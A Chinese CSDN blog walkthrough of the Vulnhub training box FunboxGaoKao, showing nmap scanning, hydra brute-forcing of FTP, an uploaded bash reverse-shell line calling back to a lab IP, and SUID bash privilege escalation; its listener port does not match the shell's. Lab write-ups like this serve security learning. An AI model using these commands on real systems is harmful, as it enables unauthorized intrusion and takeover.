Vulnhub日记(一):FunboxGaoKao

最新推荐文章于 2022-09-17 14:16:26 发布
最新推荐文章于 2022-09-17 14:16:26 发布
阅读量474 收藏
点赞数
分类专栏: VlunHub日记 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44107836/article/details/119345952
版权

靶机介绍 

FunBox.GaoKao 是作者为初学者设计的机器。这台机器需要一点暴力破解和一些FTP协议的知识。                                                               “Funbox Gaokao Walkthrough – Vulnhub – Writeup”

主要参考Krishna Upadhyay的WriteUp所写

虚拟机链接:https://www.vulnhub.com/entry/funbox-gaokao,707/

开始练习

使用Nmap找到靶机ip:192.168.56.101

本机ip:192.168.56.102

nmap -v 192.168.56.0/24

 查找开启的服务,发现能ftp匿名登录,http只有apache的页面,没有什么用处

nmap -A  192.168.56.101

 下载welcome.msg,发现welcome.msg有类似用户名信息

用dirsearch扫描网页目录

dirsearch -r -u http://192.168.56.101

没有发现有用的文件,根据之前发现的用户名选择字典后爆破ftp(字典推荐用大一点的,小字典可能会跑不出来,我的小字典都没跑出来,下载Writeup上的字典才成功,字典名为rockyou.txt)

hydra -v -l sky -p dic_password_ftp.txt 192.168.56.101 ftp

 使用用户登录,查看文件,发现user.flag文件

 打开文件,得到第一个flag,发现是shell脚本,之后写一个反弹shell脚本发现可以上传

bash -i >& /dev/tcp/192.168.37.131/8080 0>&1
put 001.flag
nc -nvlp 8090
cat 001.flag

 成功反弹Shell

 返回上级目录,查看其他用户

cd ../

 

查看当前用户,发现是sarah,开始尝试提权

 使用find命令查看拥有suid权限的文件,发现bash

find / -perm -u=s -type f 2>/dev/null

参考链接:https://gtfobins.github.io/gtfobins/bash/

 成功提权后,拿到flag

bash -p
cd /root

 总结

暴力破解的部分卡的比较久,bash提权方面比较有收获

Dawn_Xiiii
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vs项目添加日志功能
金蒂
11-18 2867
这里写目录标题前言:Log4net框架配置Log4net期待您的斧正! 前言: 在我们做项目的时候总会遇到各种各样的问题,虽然问题可以解决,但是错误却不能保留下来,这时候就需要一个日志功能对我们的操作进行存储 Log4net框架 接下来小编大家介绍vs自带的一种日志框架帮助我们添加日志 这就是Log4net。 Log4net非常强大,它可以输出到控制台、文件、数据库、系统事件、Email等,几乎无所不能。然后它可以通过配置让日志系统实时生效,比如说在服务运行的过程中修改配置改变输出目标,改变日志等级等 配
Vulnhub-FUNBOX: GAOKAO渗透
laoyanCZ的博客
01-25 1032
由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!👉本文靶机下载连接-戳我直接下载!👈。
vulnhub Funbox: GaoKao(funbox9)
箭雨镜屋
04-08 908
渗透思路:nmap扫描----ftp匿名访问获取可能的用户名----hydra爆破ftp密码----ftp上传反弹shell,等定时任务执行获得shell----bash suid提权
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox9(GaoKao)
Aluxian_的博客
09-17 1046
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。FunBox系列第九个靶机了 这个靶机比较简单1.信息收集 获取ip地址 和端口信息2.hydra暴力破解 (工具的基本使用)3.bash的反弹shell(主要是记住回弹命令)3.bash suid提权(第一次使用挺简单的)这是这个系列第八个靶机啦比较简单 希望对刚入门得小白有帮助!
靶机渗透练习30-Funbox9-GaoKao
hirak0的博客
04-18 863
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-gaokao,707/ Description It’s a box for beginners, but not easy. Gather careful !!! Hint: Don’t waste your time ! Every BruteForce-Attack at all ports can be stopped after 1500 trys per account. Enjoy the game
VulnHub靶场MONEYBOX:1
01-05
VulnHub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透测试使用。MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
老规矩,开启虚拟机前分配一个和攻击机一样的网卡,选择我已移动该虚拟机;开启虚拟机后,netdiscover确认一下目标,我的靶机ip为192.168.190.189 靶机描述里还要配置host指向kioptrix3.com vim /etc/hosts 利用...
VulnHub-Walkthroughs:Alienum的md格式的VulnHub演练
03-07
在网络安全领域,VulnHub 是一个深受爱好者和专业人员欢迎的平台,它提供了一系列虚拟机(VM)镜像,用于模拟真实的网络环境,帮助用户提升漏洞利用和渗透测试的技能。本篇文章将深入探讨名为 "Alienum" 的 VulnHub ...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
在XXE靶场中,我们可以模拟实际场景进行练习,例如在vulnhub的XXE Lab:1靶场中,首先识别靶机IP,使用工具如nmap扫描开放端口,然后通过目录遍历(如`robots.txt`)和Burp Suite抓包分析,确定XML数据传输。...
vulnhub靶场库中 DC:1
07-06
Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和掌握基础的渗透测试技巧和漏洞利用...
打靶练习vulnhub: haclabs
03-20
打靶练习vulnhub: haclabs
打靶练习vulnhub: stapler
最新发布
03-28
打靶练习vulnhub: stapler
VulnHub:VulnHub Box演练
03-16
VulnHub:VulnHub Box演练
vulnhub:本地搜索NVD
05-09
Vulnhub __ __ _ _ _ _ \ \ / / | | | | | | | | \ \ / /_ _ | | _ __ | |__| | _ _ | |__ \ \/ /| | | || || '_ \ | __ || | | || '_ \ \ / | |_| || || | | || | | || |_| || |_) | \/ \__,_||_||_| |_||_|...
VulnHub渗透测试实战靶场 - Funbox: GaoKao
LYJ20010728的博客
08-28 1005
VulnHub渗透测试实战靶场 - Funbox: GaoKao题目描述环境下载Funbox: Lunchbreaker靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 题目描述 It's a box for beginners, but not easy. Gather careful !!! Hint: Don't waste your time ! Every BruteForce-Attack at all ports can be stopped after 1500 trys per a
Funbox6靶机
小小猪的博客
06-30 327
Funbox6靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.133 扫描端口 使用ip访问web服务访问不了,显示域名,添加hosts文件 在/etc/hosts文件下添加域名 FUNBAO:GAMBLE HALL下面有个OPEN/CLOSED状态。只有在为OPEN状态的时候才能玩这个靶机,具体要等多久,我也不知道,反正就想等等(估计七八分钟左右的样子) 解密flag 获得用户名密码 登录上传大马,反弹shell 因在下手速
Vulnhub:FUNBOX-EASYENUM靶机
logan_logan的博客
06-06 280
1.浏览器输入目标靶机IP地址浏览网页 2.端口扫描 nmap -p- 192.168.31.128 nmap -sC -sV -p 22,80 192.168.31.128 3.目录枚举 目录枚举的时候找到了一个有意思的mini.php目录 gobuster dir -u http://192.168.31.128 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html.txt 4.在浏览器打开min
vulnhub-FunBox-wp
yutianovo的博客
08-08 509
靶机描述 Boot2Root ! This is a reallife szenario, but easy going. You have to enumerate and understand the szenario to get the root-flag in round about 20min. This VM is created/tested with Virtualbox. Maybe it works with vmware. If you need hints, call me o
vulnhub靶机系列:
09-09
Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值